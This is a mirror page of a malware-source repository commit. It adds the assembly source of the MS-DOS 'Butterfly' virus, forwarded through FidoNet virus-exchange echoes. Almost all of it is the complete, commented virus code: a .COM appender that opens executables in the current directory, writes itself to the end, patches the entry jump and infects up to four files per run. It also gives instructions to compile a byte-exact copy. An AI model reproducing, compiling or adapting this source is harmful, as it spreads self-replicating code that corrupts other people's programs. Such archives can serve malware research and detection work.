daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 15:59:24 +00:00
Code Issues Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
vxunderground
2021-01-12 18:07:35 -06:00
committed by GitHub
parent 6bf46a48b9
commit c227f1121a
97 changed files with 38998 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSDOS/Virus.MSDOS.Unknown.vir61.asm
+218
View File
@@ -0,0 +1,218 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 51 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:17
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : BUTTRFLY.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Hans Schotel, 2:283/718 (06 Nov 94 17:56)
;* To : Fred Lee
;* Subj : BUTTRFLY.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Hans.Schotel@f718.n283.z2.fidonet.org
Comment|
************************************************************************
Virus Name: Butterfly Virus
Effective Length: 302 bytes
Disassembled by Silent Death - 1993
Notes:
- Non-Resident .COM appender
- infects up to 4 files in the current directory
- infected files have 01h as the 4th byte
- ok virus to learn off of but a lot of wasteful code
To Compile: [Byte matchup!]
TASM /m File.asm
TLINK /t FILE.obj
************************************************************************|
.model tiny
.code
org 100h
start:
jmp virus
nop
nop
oldjmp db 0cdh ; int 20h
newjmp db 20h
db 90h ; nop
id db 1 ; infection marker
virus:
call delta ; get delta offset
delta:
pop bp
sub bp,10Bh ; adjust delta offset
mov di,100h ; move bytes to the start
lea si,[bp+oldjmp] ; original starting
mov cx,4 ; move four bytes
cld ; clear direction flag
rep movsb ; move the bytes
mov ah,1Ah ; set dta
lea dx,[bp+dta] ; set into heap
int 21h
mov byte ptr [bp+offset counter],0 ; reset counter
mov ah,4Eh ; find first asciiz file
lea si,[bp+dta+1eh] ; points to fname in dta
lea dx,[bp+fspec] ; files to find (*.COM)
push dx ; save file spec
jmp short findfiles
returntohost:
mov ah,1Ah ; set dta
mov dx,80h ; to original position
int 21h
xor ax,ax ; clear all registers
xor bx,bx ; no real need to
xor cx,cx
xor dx,dx
xor si,si
xor di,di
mov sp,0FFFEh ; adjust stack pointer
mov bp,100h ; return to here
push bp
xor bp,bp ; clear this
retn ; return to host
closeup:
or bx,bx ; is handle 0?
jz findnext ; yup so don't bother closing
mov ch,0 ; get attributes
mov cl,[bp+dta+15h] ; theres no point!
mov ax,5701h ; set files date/time
mov cx,word ptr [bp+dta+16h]; get original time
mov dx,word ptr [bp+dta+18h]; get original date
int 21h
mov ah,3Eh ; close file
int 21h
xor bx,bx ; delete handle
findnext:
mov ah,4Fh ; find next file
findfiles:
pop dx ; get filespec
push dx
mov cx,7 ; all attributes
xor bx,bx ; make sure no handle
int 21h
jnc infect ; jump if file found
jmp returntohost2 ; no files found then quit
vname db 0FFh
db 'Goddamn Butterflies' ; YA Know!
db 0FFh
infect:
mov dx,si ; dx => fname in dta
mov ax,3D02h ; open file read/write
int 21h
jc closeup ; if error close up, get another
mov bx,ax ; handle to bx
mov ah,3Fh ; read from file
mov cx,4 ; four bytes
lea dx,[bp+oldjmp] ; save here
int 21h
mov ax,word ptr [bp+dta+23h]; get end of filename
cmp ax,444Eh ; is file command.com?
je closeup ; yup so leave it
cmp [bp+id],1 ; is file infected?
je closeup ; yup so leave it
mov ax,word ptr [bp+dta+1ah]; get file size
cmp ax,121 ; is file smaller than 121?
jb closeup ; if it is leave it
mov ax,4202h ; file pointer to end
cwd
xor cx,cx
int 21h
cmp ax,64768 ; is file to big to infect
ja closeup ; if above then jump
mov [bp+data],ax ; save file size
lea dx,[bp+oldjmp] ; buffer to write from
mov cx,4 ; 4 bytes
mov ah,40h ; write oldjmp to end of file
int 21h
lea dx,[bp+virus] ; start of virus
mov cx,12Ah ; write virus (298) to end
mov ah,40h ; write to file
int 21h
mov ax,4200h ; file pointer to start
cwd
xor cx,cx
int 21h
mov ax,[bp+data] ; get the file size
inc ax ; increment the file size
mov word ptr [bp+newjmp],ax ; save the new jump
mov [bp+oldjmp],0E9h ; new jump
mov [bp+id],1 ; infection marker
lea dx,[bp+oldjmp] ; new jump
mov ah,40h ; write new start
mov cx,4 ; four bytes
int 21h
inc [bp+counter]
cmp [bp+counter],4 ; has 4 files been infected?
jae returntohost3 ; yup so return to host
jmp closeup ; close current file
returntohost2: ; This is a total waste!
mov di,100h ; start of file
cmp word ptr [di],20CDh ; are we the original
je returntohost3 ; yup
returntohost3:
jmp returntohost
fspec db '*.COM',0 ; files to find
dta db 43 dup (0) ; holds dta
counter db 0 ; holds file counter
data dw 0 ; holds new jump offset
end start
;-+- Concord/QWK O.O1 Beta-7
; + Origin: Data Fellows BBS (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/L Specify library search paths
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)